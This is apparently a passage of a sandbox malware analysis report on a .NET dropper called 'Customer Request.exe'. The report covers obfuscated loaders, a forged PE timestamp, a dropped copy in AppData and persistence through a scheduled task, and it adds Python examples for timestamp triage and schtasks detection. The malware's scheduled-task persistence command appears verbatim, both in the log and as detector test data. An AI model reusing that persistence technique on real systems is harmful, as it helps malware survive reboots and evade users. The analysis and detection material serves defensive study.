                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, 0.2.Customer Request.exe.44b9a00.2.raw.unpack, 0.2.Customer Request.exe.b670000.5.raw.unpack, frwa3jjtrF5QwZLvOa.cs | .Net Code: W2WYTa9Jtm System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Customer Request.exe.7460000.4.raw.unpack, RK.cs | .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[]) (the method name encodes a run of Unicode format characters, U+200B-U+200F zero-width and directional marks, U+202A-U+202E bidirectional controls and U+206A-U+206F deprecated format controls, all of which are invisible when rendered, so the loader method shows up as a blank name)
                  Source: Customer Request.exe | Static PE information: 0xAADB355B [Sun Oct 31 23:59:23 2060 UTC] (IMAGE_FILE_HEADER.TimeDateStamp; a link timestamp decades in the future, hence not the genuine build time)
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_012C24B9 push 8BFFFFFFh; retf 10_2_012C24BF
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_012C24F8 push cs; ret 10_2_012C24FF
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C958C9 push es; iretd 10_2_06C958CC
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C958DD push es; iretd 10_2_06C958E0
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95895 push es; iretd 10_2_06C958C8
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95849 push es; iretd 10_2_06C95854
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95844 push es; iretd 10_2_06C95848
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95855 push es; iretd 10_2_06C9585C
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C9586D push es; iretd 10_2_06C95870
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95871 push es; iretd 10_2_06C9587C
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C9581D push es; iretd 10_2_06C95820
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95815 push es; iretd 10_2_06C9581C
                  Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 10_2_06C95821 push es; iretd 10_2_06C95824
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D046F1 push ecx; iretd 11_2_06D046F2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D057F1 pushfd ; iretd 11_2_06D057F2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D047F9 push edx; iretd 11_2_06D047FA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04791 push edx; iretd 11_2_06D04792
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04070 push eax; iretd 11_2_06D04072
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D041DF push eax; iretd 11_2_06D041E2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D041E3 push eax; iretd 11_2_06D041EA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D041B9 push eax; iretd 11_2_06D041BA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04119 push eax; iretd 11_2_06D0411A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04ED8 push esi; iretd 11_2_06D04EDA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04E89 push esi; iretd 11_2_06D04E8A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04CB9 push ebp; iretd 11_2_06D04CBA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04DE1 push esi; iretd 11_2_06D04DE2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04AC8 push esp; iretd 11_2_06D04ACA
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04AA1 push esp; iretd 11_2_06D04AA2
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04A48 push esp; iretd 11_2_06D04A4A
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04A00 push ebx; iretd 11_2_06D04A02
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 11_2_06D04A03 push ebx; iretd 11_2_06D04A0A
                  Source: 0.2.Customer Request.exe.4454fe0.3.raw.unpack, 0.2.Customer Request.exe.44b9a00.2.raw.unpack, 0.2.Customer Request.exe.b670000.5.raw.unpack (the same unpacked .NET assembly dumped from three memory regions; the findings are identical in all three) | High entropy of concatenated method names, by class:
                      nwa3brccgEIZB7CI0Yl.cs: 'u9cSeX3WEQ', 'b8LSzlTOAc', 'oP025LniZm', 'XTY2c9pYTy', 'htI2n9xkHM', 'NCO2P87bGf', 'YnZ2YKPHlq', 'aMw2I3XZRP', 'vsr2uqGq4f', 'nPo26gq66F'
                      U6b0Q7eVMSchg0E0I1.cs: 'ySQSaxnYuG', 'DbnSr5iCl5', 'NmmSybifIw', 'WgcS019Esb', 'BDqS8385GS', 'LW4Sj4X3gn', 'Next', 'Next', 'Next', 'NextBytes'
                      zTcnkLHLej3bfwggl5.cs: 'dQNrhNstWE', 'pperM4rk1q', 'ccOa12nvqU', 'PjlaoIyYsZ', 'E3TaF9jsJ9', 'jZaatET0hq', 'c2GaRaI1sZ', 'wunaQIJuLD', 'GeRainDDCE', 'gOaabXA1Is'
                      frwa3jjtrF5QwZLvOa.cs: 'EAYPILJFaE', 'sABPu5lPI8', 'CvuP6yMuvL', 'aOEPaO0X8Y', 'fHoPrF9Mac', 'MLnPyJoaQR', 'BUvP0sypIR', 'GgbPjmdtFr', 'MtsPLhdEgD', 'N4dPfDvhmI'
                      MKTCX2WxWtgjxOuELw.cs: 'pCKyItwBiL', 'O1Uy6jlNXO', 'NF5yrD8ORo', 'Xvcy00W9bl', 'iFKyjRD0D0', 'xTcrVl4JgE', 'ke0rNvSQaZ', 'KxurxGPpfZ', 'rParBknmXA', 'keirmAHEvu'
                      ae0uF1mjLay0CmtTyL.cs: 'Dn08WiZOBj', 'VOg8laJbJD', 'B4c81gh8Tn', 'ESg8oLpE8B', 'UKJ8Ff4x2v', 'aLe8t8uwHI', 'i1u8Re4S1Y', 'l6f8QatBgg', 'XwD8i1wCNH', 'zkY8b8NEXb'
                      Yj3H6mYy1Ppbqq7ICB.cs: 'sqqc0qMLXp', 'g8acjnp44v', 'LobcfPJH1i', 'zO5cJgTTcn', 'xggc9l5iKT', 'nX2cKxWtgj', 'fFkKLklBuSt4kUtSsM', 'fuv58yiQhrJGZxxk1C', 'rVJccJvRRD', 'W5NcPaLqVh'
                      voPa4KNBAHLu7NiUhY.cs: 'iAGOBpnepM', 'r5QOe4Vymd', 'aBm35XyCUB', 'JLw3cxy2Rb', 'JSLO7bftSD', 'AYgOZ8LEPb', 'QriOGPwdII', 'EHVOsWwhtR', 'Cw0OEepUaq', 'Ib6OkZ8qAh'
                      eigfv4x9C1nfUEfUG5.cs: 'f6G89siqHV', 'ers8Osmx04', 'PAO88eFEcV', 'eUm82d5W6Y', 'Dtn8XlL45i', 'W7w8UpTBBs', 'Dispose', 'UTu3uKKAij', 'nA436uVP10', 'G3q3a7Ljmt'
                      l3KgVTaQOpQLbPQ7Vd.cs: 'EditValue', 'GetEditStyle', 'CVwnmXGfuk', 'uxgneF3sGS', 'o7wnz2B7rS', 'YCNP5lkVF3', 'Q5pPcGFem1', 'Ww0Pnm4ANC', 'jYNPPC2ETv', 'NhDcgnRafqyVPlIpU3d'
                      TZrpZ4RP1a6x3HlVwy.cs: 'rtQ0uG5eT3', 'nCc0aWAEjc', 'Sq40yFHxZE', 'Vi6yesWZyG', 'DAayztlnSm', 'dnL05ILylX', 'C5u0cXtp9A', 'H3a0nxd0rC', 'VsH0Pkf7R1', 'jC20YfaaNR'
                      eF83cRcY6Eg33QpsSPn.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NhxA8x9o7C', 'X84ASdUKf6', 'Fb4A2J5B6f', 'I9HAAmKiiq', 'Ty6AXswBQF', 'rT3ADASovC', 'ePnAUq3uS0'
                      EqMLXp468anp44vyd9.cs: 'SxT6s0AFmK', 'HAB6Ei0QYN', 'k4x6kna052', 'eSd6pbsEx2', 'Oiw6Vx07w0', 'XOH6N5K9u2', 'gom6xPHbc4', 'QuH6BgpFGx', 'j3x6mwfccC', 'DAV6ecNQyL'
                      pgNG05o8KRp2IrkESO.cs: 'fePyUy3x0c', 'WLAywjqVtq', 'HRYyTeIkv3', 'ftryvhj1y4', 'i9fyg50XNo', 'zdeyMsPEvE', 'm28yqb7jHc', 'gkOyHPTKeQ', 'IxnTM1FbxaTKR26JOCM', 'rP2QssF3lQD00dffJw3'
                      LSj5QTGLmePXRUoOpu.cs: 'Y1IC4e9TMO', 'I3QCq412j9', 'W00CWTs1pm', 'BYHClXoFs7', 'GAGCoEQ17R', 'gh0CFrOe7s', 'vUWCR9TuP4', 'nn0CQlcS8h', 'YemCbakB7c', 'ET2C7Tx0BK'
                      lpRipOnrG8qpZxZ10k.cs: 'LjqTceHBW', 'NJevmCc7Z', 'SPhgHdISO', 'apwMesxvG', 'UX9q6qMul', 'RxUHIW8s3', 'QeDpaTrEuoVoVwiTZ8', 'bGViOJddVf9Emfyphw', 'yIt3fkshy', 'ORYSv1xNC'
                      hleLjQqobPJH1iTO5g.cs: 'dHVavvS7Kx', 'dIUagGZcrU', 'a7Ka4CUNq6', 'RC4aqVN00F', 'lFea9jXgh3', 'VHZaKdXXOy', 'EXKaOptlIU', 'AEga3qj5GT', 'xlQa8UfEBs', 'OgnaSbiRLm'
                      Lw2SpOc5C8xC14K5eyu.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mhsS7PHfLV', 'ylbSZREJxg', 'tKsSGbFHRQ', 'rdgSsCuRS7', 'oAKSELiUVa', 'Lj4Sk2DjfX', 'PuKSp8rTGL'
                      VDpgCYcPsRT7I193x5H.cs: 'Gr52e42U75', 'QiA2zqfryx', 'pw3A50cRQK', 'njxWXwgPjxwfF4EwWu4', 'UVwkBngq5OZUHAeECG7', 'h9mYTKg10xqUbyEtQZo', 'ULEjAtg5PkEDQO6Vyl2', 'WlMv0sgtN1wRrX4O9C5'
                      Y2ncPE6QhKHr2reXlY.cs: 'Dispose', 'HnfcmUEfUG', 'UaTnlmSIyD', 'RNVLRMiOkb', 'aBicet0tEK', 'Y3HczJybVM', 'ProcessDialogKey', 'uI5n5e0uF1', 'kLancy0Cmt', 'zyLnnN6b0Q'
                      EyRq7giU4A3bn2IwLa.cs: 'nTb0wDZtN7', 'jUT0dvUVuW', 'AUg0T8dP7n', 'w5f0vCN3Kn', 'YyF0h3EU23', 'Rnp0gx8nTd', 'GFY0MY29uQ', 'WUP04xuyud', 's2W0q2qhbW', 'ItB0H2o8TE'
                      k4ceGZkW8oS0OdyGo0.cs: 'ToString', 'feJK7Uin1m', 'FKBKlV8ern', 'SBIK1htgX1', 'Df1KosL5p8', 'IOnKF3yAq1', 'pJtKtM1rYy', 'h3EKRQDAOk', 'RIBKQbe4cT', 'KGcKiQnRme'
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | File created: C:\Users\user\AppData\Local\Temp\tmpG548.tmp (copy)
                  Source: C:\Users\user\Desktop\Customer Request.exe | File created: C:\Users\user\AppData\Roaming\gCFuOglEso.exe
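                  The future-dated TimeDateStamp listed in this section (0xAADB355B) is a cheap triage signal that needs no sandbox. The Python below is an added example, not part of the Joe Sandbox report: it parses the COFF file header of a PE image and classifies the stamp as zeroed, future-dated, implausibly old or plausible. The header-only PE stub it builds is constructed sample data carrying the value reported for Customer Request.exe; it is not the sample, and the one-day clock-skew allowance and 1990 lower bound are the example's own choices.

```python
"""Triage check for PE link timestamps (added example, not from the report).

Parses the MZ header's e_lfanew pointer, the PE signature and the
TimeDateStamp field of IMAGE_FILE_HEADER, then classifies the stamp.
"""
import struct
import time
from datetime import datetime, timezone
from typing import Optional

PE_SIGNATURE = b"PE\0\0"
# Anything older than this is as implausible as a future date. A stamp of 0 is
# treated separately: reproducible builds and some linkers zero the field.
EARLIEST_PLAUSIBLE = int(datetime(1990, 1, 1, tzinfo=timezone.utc).timestamp())
CLOCK_SKEW = 86400  # allow one day of skew between build box and analysis box


def pe_timestamp(data: bytes) -> int:
    """Return the raw TimeDateStamp of a PE image; ValueError if `data` is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 + 20 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER follows the 4-byte signature: Machine(2) NumberOfSections(2)
    # TimeDateStamp(4) PointerToSymbolTable(4) NumberOfSymbols(4)
    # SizeOfOptionalHeader(2) Characteristics(2)
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 4 + 4)
    return stamp


def classify_timestamp(stamp: int, now: Optional[int] = None) -> str:
    """Classify a TimeDateStamp as 'zeroed', 'future', 'too_old' or 'plausible'."""
    now = int(time.time()) if now is None else now
    if stamp == 0:
        return "zeroed"
    if stamp > now + CLOCK_SKEW:
        return "future"
    if stamp < EARLIEST_PLAUSIBLE:
        return "too_old"
    return "plausible"


def timestamp_utc(stamp: int) -> str:
    """Render a TimeDateStamp as 'YYYY-MM-DD HH:MM:SS' in UTC."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def build_minimal_pe(stamp: int) -> bytes:
    """Construct a header-only PE stub (sample data, not a runnable binary) with `stamp`."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=IMAGE_FILE_MACHINE_I386, no sections, the stamp, no symbols,
    # SizeOfOptionalHeader=0xE0 (PE32), Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + PE_SIGNATURE + coff


if __name__ == "__main__":
    # 0xAADB355B is the TimeDateStamp this report shows for Customer Request.exe
    sample = build_minimal_pe(0xAADB355B)
    ts = pe_timestamp(sample)
    print(f"TimeDateStamp=0x{ts:08X} -> {timestamp_utc(ts)} UTC: {classify_timestamp(ts)}")
```

                  Run against a real file with pe_timestamp(open(path, "rb").read()). Treat "future" and "too_old" as triage flags rather than verdicts: legitimate binaries with deliberately stamped or zeroed headers exist, and a plausible stamp proves nothing, since it is just as easy to forge.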

                  Boot Survival

                  Source: C:\Users\user\Desktop\Customer Request.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"
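                  The schtasks command line above is the behaviour behind the "Scheduled temp file as task from temp location" Sigma hit listed in the overview: the task is registered with /Create and its definition is read via /XML from a file in the user's Temp folder. The Python below is an added example, not from the report and not a Sigma rule, of how a process-creation detection would parse such command lines and flag that combination. It goes slightly beyond the report's single case by also accepting the bare "schtasks" image name and %TEMP%/%TMP% paths. The event list is constructed; only its first entry is taken from this report, the rest are made-up benign cases.

```python
"""Flag schtasks.exe creating a task from an XML definition in a temp folder
(added example, not from the report or from any Sigma rule).

Intended to run over process-creation events (Sysmon EventID 1 / 4688 CommandLine).
"""
import re
import shlex
from typing import List, Optional

# Locations a legitimate installer rarely uses for a persistent task definition.
TEMP_DIR_RE = re.compile(
    r"\\appdata\\local\\temp\\|\\windows\\temp\\|%temp%|%tmp%", re.IGNORECASE
)

# Constructed event list. Only the first command line is taken from this report;
# the rest are made-up benign cases to show what must not fire.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp"',
    r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"',
    r'schtasks.exe /Query /TN "Updates\gCFuOglEso"',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC DAILY /TN "Cleanup" /TR "C:\Tools\clean.exe"',
    r'C:\Windows\System32\notepad.exe C:\Users\user\AppData\Local\Temp\notes.txt',
]


def _unquote(tok: str) -> str:
    """Strip one pair of surrounding double quotes, if present."""
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Return {'create': bool, 'tn': str|None, 'xml': str|None} for a schtasks
    command line, or None if the image is not schtasks / schtasks.exe."""
    try:
        # posix=False keeps Windows backslashes literal and quoted paths whole
        argv = [_unquote(t) for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if not argv:
        return None
    image = argv[0].lower().rsplit("\\", 1)[-1]
    if image not in ("schtasks", "schtasks.exe"):
        return None
    info = {"create": False, "tn": None, "xml": None}
    i = 1
    while i < len(argv):
        tok = argv[i].lower()
        if tok == "/create":
            info["create"] = True
        elif tok in ("/tn", "/xml") and i + 1 < len(argv):
            info[tok[1:]] = argv[i + 1]
            i += 1
        i += 1
    return info


def is_task_from_temp(cmdline: str) -> bool:
    """True when a task is created (/Create) from an XML file (/XML) in a temp dir."""
    info = parse_schtasks(cmdline)
    if not info or not info["create"] or not info["xml"]:
        return False
    return TEMP_DIR_RE.search(info["xml"]) is not None


def flag_events(events: List[str]) -> List[str]:
    """Return the command lines from `events` that match the pattern."""
    return [e for e in events if is_task_from_temp(e)]


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        info = parse_schtasks(hit)
        print(f"ALERT task {info['tn']!r} created from {info['xml']!r}")
```

                  When this fires, the XML file is usually gone by the time an analyst looks (here the dropper also moves itself into Temp), so the durable artefact is the registered task itself: export it with schtasks /Query /TN "Updates\gCFuOglEso" /XML, or read the task file under C:\Windows\System32\Tasks\Updates\, to recover the action the malware scheduled.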

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical events)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical events)
                  Source: c:\users\user\desktop\customer request.exe | File moved: C:\Users\user\AppData\Local\Temp\tmpG103.tmp
                  Source: C:\Users\user\Desktop\Customer Request.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\Customer Request.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
